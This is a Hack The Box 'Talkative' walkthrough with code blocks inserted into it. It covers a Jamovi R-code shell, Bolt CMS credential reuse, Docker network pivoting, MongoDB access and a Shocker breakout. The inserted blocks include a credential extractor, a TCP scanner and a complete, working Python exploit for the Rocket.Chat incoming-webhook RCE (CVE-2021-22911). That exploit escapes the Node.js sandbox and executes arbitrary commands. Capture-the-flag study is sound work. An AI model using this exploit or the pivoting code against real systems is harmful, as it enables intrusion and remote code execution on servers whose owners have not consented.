🔎🦶 Enumeration/Foothold

I start every box by setting a variable to the box's IP and piping rustscan's output into xsltproc for an easy-to-read initial scan.

Reviewing the initial results I can see port 80 open, so I head over to the website. It redirects me to talkative.htb, so I add that to my hosts file.

Talkative website showing lots of juicy details.


I have to give some kudos to both authors for going the extra mile (especially TheCyberGeek) and taking the time to make it feel like an actual company website with real sentences. So many boxes are boilerplate templates and miss the initial OSINT.

I see a few possible usernames, and their profile pages show [email protected] as the email address. I note all three users and continue. In the footer I notice that the Products menu leads to additional links, and that the Talkative.htb link goes to Bolt CMS. A /bolt endpoint confirms this, but I will leave it till later.

Heading over to the TALK-A-STATS (Coming Soon) page I can see JAMOVI is listed; the application talks about data entry (a possible entry point) and has a 'beta' version available:

TALK-A-STATS mentioning Jamovi and a 'Beta' version.


The link takes me to port 8080 and I immediately see the following:

TALK-A-STATS application states it has a security issue.


Clicking the three dots in the top-right corner I can see the version is 0.9.5.5. I Google around and navigate around the application. I find Rj Editor and see that a plugin to run R code inside jamovi is installed:

Plugin states you can run R code inside jamovi.


I went down the 🐰🕳️ for a while and eventually found the Ethz – R-Manual article, which allowed me to get a reverse shell on the box.

Running a bash one-liner and catching the reverse shell.


I've been using pwncat more and more recently, which came in handy here: it let me download the bolt-administration.omv file from the box to my machine.

A jamovi .omv file is a zip archive; inside it, the xdata.json file holds the value labels for each column, and there I find a few usernames/passwords.
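As an added example (not the writeup's own code), the snippet below shows how those credentials end up readable: it builds a minimal .omv archive in memory, pulls the label tables out of xdata.json and flags the credential-looking columns. The archive, column names and passwords are constructed for the demo and are not the contents of bolt-administration.omv from the box; the CRED_HINTS list is an assumption about what column names are worth a first look.

```python
"""Added example: pull value labels out of a jamovi .omv (zip) and flag credential-like columns.
The archive built here is constructed for the demo; the column names and passwords are
placeholders, not the contents of bolt-administration.omv from the box."""
import io
import json
import zipfile

# Column names that usually mean "look here first" (assumption for the demo).
CRED_HINTS = ("user", "login", "pass", "pwd", "secret", "token", "key")


def build_sample_omv() -> bytes:
    """Construct a minimal .omv in memory: a zip holding metadata.json and xdata.json.

    jamovi stores text columns as integer codes plus a label table; each label entry is
    [code, label, importValue, pinned], which is why the interesting strings sit in xdata.json.
    """
    xdata = {
        "Username": {"labels": [[0, "alice", "alice", False], [1, "bob", "bob", False]]},
        "Password": {"labels": [[0, "Summer2022!", "Summer2022!", False],
                                [1, "letmein", "letmein", False]]},
        "Department": {"labels": [[0, "IT", "IT", False], [1, "Marketing", "Marketing", False]]},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("metadata.json", json.dumps({"dataSet": {"rowCount": 2}}))
        zf.writestr("xdata.json", json.dumps(xdata))
    return buf.getvalue()


def extract_labels(omv_bytes: bytes) -> dict:
    """Return {column: [label, ...]} from xdata.json inside the archive."""
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as zf:
        xdata = json.loads(zf.read("xdata.json"))
    labels = {}
    for column, meta in xdata.items():
        entries = meta.get("labels", []) if isinstance(meta, dict) else []
        labels[column] = [str(e[1]) for e in entries if isinstance(e, list) and len(e) > 1]
    return labels


def credential_columns(labels: dict) -> dict:
    """Keep only the columns whose name hints at credentials."""
    return {c: v for c, v in labels.items()
            if any(h in c.lower() for h in CRED_HINTS)}


def pair_credentials(labels: dict, user_col: str, pass_col: str) -> list:
    """Zip a username column with a password column by label position.

    Caveat: label order is code order, not necessarily row order, so confirm the pairing
    against the real rows (data.bin) before spraying the combinations."""
    return list(zip(labels.get(user_col, []), labels.get(pass_col, [])))


if __name__ == "__main__":
    found = extract_labels(build_sample_omv())
    for col, vals in credential_columns(found).items():
        print(f"{col}: {vals}")
    print(pair_credentials(found, "Username", "Password"))
```

Run it against a real file by replacing `build_sample_omv()` with the bytes of the downloaded .omv; `unzip -l` on the file shows the same xdata.json entry the code reads.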

I try the passwords against the services I've seen so far and get a hit on the login to the Bolt CMS admin page. Once logged in I went to Settings > Configuration > Main Configuration to see if database credentials were available. Next I went to Settings > Configuration > All Configuration Files and noticed a bundles.php file.

🔐 Escalation to Root

I edited that file, dropped in a PHP one-liner and started a pwncat listener, then requested bundles.php to grab the shell. On the container I used pwncat to upload LinPEAS and ran it. The 172.18.0.x Docker network stood out immediately, so I pulled ping onto the box and ran a loop over it, then poked at 172.18.0.1 until I got a hit for SSH. Password re-use did the rest: the same password as for Bolt got me in over SSH.

I used pwncat to upload LinPEAS into the SSH session. I ran a loud scan but didn't see anything useful, so I uploaded pspy next to see if anything was running in the background:

I can see an update_mongo.py script running. Looking at the MongoDB documentation I can see the default ports listed as 27017 – 27020. I used LinPEAS, with its host/port scan capabilities, to find the database.
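As an added example covering both of the pivoting steps above (finding the SSH host on the Docker network, then locating MongoDB on its default ports), here is a small TCP connect scanner in Python. It is not the writeup's own tooling, which used a ping loop and LinPEAS; the 172.18.0.0/24 range is assumed from the 172.18.0.1 gateway seen earlier, and the hosts and ports are placeholders.

```python
"""Added example: TCP connect sweep and port check for pivoting inside a Docker network.
Not the writeup's own commands. 172.18.0.0/24 is assumed from the 172.18.0.1 gateway;
adjust it to the range LinPEAS or `ip route` shows you on the container."""
import ipaddress
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

SSH_PORT = 22
MONGO_PORTS = range(27017, 27021)  # 27017-27020, MongoDB's default port range


def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """True when a full TCP handshake to host:port succeeds (connect_ex returns 0)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan_ports(host: str, ports, timeout: float = 0.5, workers: int = 64) -> list:
    """Return the sorted list of open ports on one host."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=max(1, min(workers, len(ports)))) as ex:
        hits = list(ex.map(lambda p: (p, is_open(host, p, timeout)), ports))
    return sorted(p for p, ok in hits if ok)


def sweep_hosts(network: str, port: int, timeout: float = 0.5, workers: int = 64) -> list:
    """Return the hosts in `network` that accept a TCP connection on `port`."""
    hosts = [str(h) for h in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=max(1, min(workers, len(hosts)))) as ex:
        hits = list(ex.map(lambda h: (h, is_open(h, port, timeout)), hosts))
    return [h for h, ok in hits if ok]


if __name__ == "__main__":
    net = sys.argv[1] if len(sys.argv) > 1 else "172.18.0.0/24"
    ssh_hosts = sweep_hosts(net, SSH_PORT)
    print("SSH on:", ssh_hosts or "none")
    # Second pass: which containers expose MongoDB's default ports?
    for h in ipaddress.ip_network(net, strict=False).hosts():
        open_mongo = scan_ports(str(h), MONGO_PORTS)
        if open_mongo:
            print(f"MongoDB candidate {h}: {open_mongo}")
```

A connect scan completes the handshake, so it is noisy in the target's logs but needs no raw sockets, which matters when you are an unprivileged user inside a container with no nmap or ping.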

I then used chisel to forward the port to my local machine, running one side from Saul's SSH session and the other from my attacker session.

Once the connection was in place I 😭 for a moment, realizing it required another tool to connect to this database. I found these instructions HERE, ignored them and found a single command for a deprecated tool (the tool still works, so I proceeded with it 😁).

Reviewing the results I could now see this database was backing a Rocket.Chat application, which I had seen before in HTB Paper. I referred to the link HERE to reset the password.

Logged into Rocket Chat as the Admin account.


The first thing I did was look for the version number as I saw no chats/channels available:

Rocket Chat version information.


After some research I found CSEnox – CVE-2021-22911 AND THIS, which showed I could get RCE through an incoming webhook. The process was pretty straightforward once I understood that the webhook script runs as Node.js.

🥇 First

🥈 Second

Building a WebHook by going to Administration > Integration > Incoming WebHook.


Finalizing the WebHook with my reverse shell.


🥉 Third

Send the full curl, making sure your listener is running to catch the shell.
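As an added example of the three webhook steps, written in Python rather than taken from the writeup or from the CSEnox exploit, the block below drives the Rocket.Chat REST API end to end: log in as the admin account you now control, create an incoming webhook integration whose script breaks out of the Node.js sandbox, and POST a command to the resulting hook URL. The server URL, channel and command are placeholders; `rocket.cat` is Rocket.Chat's default bot user, and creating integrations needs an admin session, which is why the password reset above came first.

```python
"""Added example: Rocket.Chat incoming-webhook RCE flow (the post-auth stage of the
CVE-2021-22911 chain). Not the writeup's or CSEnox's code. Assumes an admin login;
URL, channel and command are placeholders."""
import json
import sys
import urllib.request

# Integration scripts run in a Node.js vm sandbox with no require(). The host passes
# `console` in, so a Function built through console.log.constructor executes in the
# host realm and returns the real require, giving access to child_process.
SCRIPT_TEMPLATE = """class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec(request.content.CMD_FIELD);
    return { content: { text: 'ok' } };
  }
}
"""


def rce_webhook_script(cmd_field: str = "cmd") -> str:
    """JS body for the integration; the command is read from the posted JSON field."""
    return SCRIPT_TEMPLATE.replace("CMD_FIELD", cmd_field)


def integration_payload(name: str, channel: str, script: str, username: str = "rocket.cat") -> dict:
    """Body for POST /api/v1/integrations.create (step one and two of the writeup)."""
    return {
        "type": "webhook-incoming",
        "name": name,
        "enabled": True,
        "username": username,   # user the webhook posts as; rocket.cat exists by default
        "channel": channel,     # e.g. "#general"
        "scriptEnabled": True,
        "script": script,
    }


def hook_url(base_url: str, integration: dict) -> str:
    """Incoming webhooks are reachable at /hooks/<integration id>/<token>."""
    return f"{base_url.rstrip('/')}/hooks/{integration['_id']}/{integration['token']}"


class RocketChatClient:
    def __init__(self, base_url: str):
        self.base_url = base_url.rstrip("/")
        self.headers = {"Content-Type": "application/json"}

    def _post(self, url: str, body: dict, headers: dict) -> dict:
        req = urllib.request.Request(url, data=json.dumps(body).encode(), headers=headers, method="POST")
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read() or b"{}")

    def login(self, user: str, password: str) -> None:
        data = self._post(f"{self.base_url}/api/v1/login", {"user": user, "password": password}, self.headers)
        self.headers["X-Auth-Token"] = data["data"]["authToken"]
        self.headers["X-User-Id"] = data["data"]["userId"]

    def create_integration(self, payload: dict) -> dict:
        return self._post(f"{self.base_url}/api/v1/integrations.create", payload, self.headers)["integration"]

    def fire(self, integration: dict, cmd: str, cmd_field: str = "cmd") -> dict:
        """Step three: POST the command to the hook (have your listener up first)."""
        return self._post(hook_url(self.base_url, integration), {cmd_field: cmd},
                          {"Content-Type": "application/json"})


if __name__ == "__main__":
    # usage: rc_hook.py http://chat.example:3000 admin 'Passw0rd' '#general' 'id > /tmp/x'
    base, user, password, channel, cmd = sys.argv[1:6]
    rc = RocketChatClient(base)
    rc.login(user, password)
    hook = rc.create_integration(integration_payload("sync-job", channel, rce_webhook_script()))
    print("hook:", hook_url(base, hook))
    print(rc.fire(hook, cmd))
```

Defensively, the same API lets you list integrations (`/api/v1/integrations.list`) and review any script that mentions `child_process` or `process.mainModule`; a webhook created by an account that should not have logged in is the artefact this attack leaves behind.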

Once on the box I ran LinPEAS and LinEnum and discovered it was vulnerable to Shocker (the Docker breakout that reads host files through open_by_handle_at, which only works when the container holds CAP_DAC_READ_SEARCH). I altered the script to pull the root flag and compiled it, then uploaded the binary to the box and ran it for the flag. This part is currently not documented (but will be when I'm feeling less lazy).
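As an added check that is not part of the writeup, here is how to confirm from inside a container whether Shocker can work at all before compiling anything: the exploit relies on open_by_handle_at(2), which the kernel gates on CAP_DAC_READ_SEARCH, and Docker's default capability set (CapEff 00000000a80425fb) does not include it, so a vulnerable container must have been started with extra capabilities. The two /proc/self/status fragments in the block are constructed samples.

```python
"""Added example: decode CapEff from /proc/self/status and test the Shocker precondition.
The two sample status fragments are constructed; CAP_* bit numbers follow the kernel's
include/uapi/linux/capability.h."""
import os
import re

CAP_NAMES = {
    0: "CAP_CHOWN", 1: "CAP_DAC_OVERRIDE", 2: "CAP_DAC_READ_SEARCH", 3: "CAP_FOWNER",
    4: "CAP_FSETID", 5: "CAP_KILL", 6: "CAP_SETGID", 7: "CAP_SETUID", 8: "CAP_SETPCAP",
    10: "CAP_NET_BIND_SERVICE", 12: "CAP_NET_ADMIN", 13: "CAP_NET_RAW", 16: "CAP_SYS_MODULE",
    18: "CAP_SYS_CHROOT", 19: "CAP_SYS_PTRACE", 21: "CAP_SYS_ADMIN", 27: "CAP_MKNOD",
    29: "CAP_AUDIT_WRITE", 31: "CAP_SETFCAP",
}

# Constructed samples: Docker's default set, and the same set plus CAP_DAC_READ_SEARCH (bit 2).
DEFAULT_DOCKER_STATUS = (
    "Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
)
SHOCKER_STATUS = (
    "Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425ff\nCapEff:\t00000000a80425ff\n"
)


def decode_caps(hex_mask: str) -> set:
    """Turn a CapEff/CapPrm hex mask into the set of capability names."""
    mask = int(hex_mask, 16)
    return {CAP_NAMES.get(bit, f"CAP_{bit}") for bit in range(64) if mask >> bit & 1}


def effective_caps(status_text: str) -> set:
    """Parse the CapEff line of a /proc/<pid>/status dump."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line in status text")
    return decode_caps(m.group(1))


def shocker_possible(status_text: str) -> bool:
    """open_by_handle_at() needs CAP_DAC_READ_SEARCH; without it shocker dies with EPERM."""
    return "CAP_DAC_READ_SEARCH" in effective_caps(status_text)


def read_self_status() -> str:
    with open("/proc/self/status") as fh:
        return fh.read()


if __name__ == "__main__":
    text = read_self_status() if os.path.exists("/proc/self/status") else DEFAULT_DOCKER_STATUS
    print(sorted(effective_caps(text)))
    print("shocker possible:", shocker_possible(text))
```

The same decoder tells you whether CAP_SYS_ADMIN is present, which opens different escape routes; for the defender the fix is the inverse check in CI, failing any container spec that adds DAC_READ_SEARCH or SYS_ADMIN without a documented reason.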

Rooted

Published On: August 24th, 2022 / Categories: HTB, Technology

One Comment

Christopher Soehnlein, 1st July 2022 at 12:12 pm:

I've been super busy with life (job, getting married, etc.), so I haven't been actively writing guides. I have notes for Noter, StreamIO, Trick, Scrambled and Carpediem (ongoing) that I will be publishing on my site in due course.
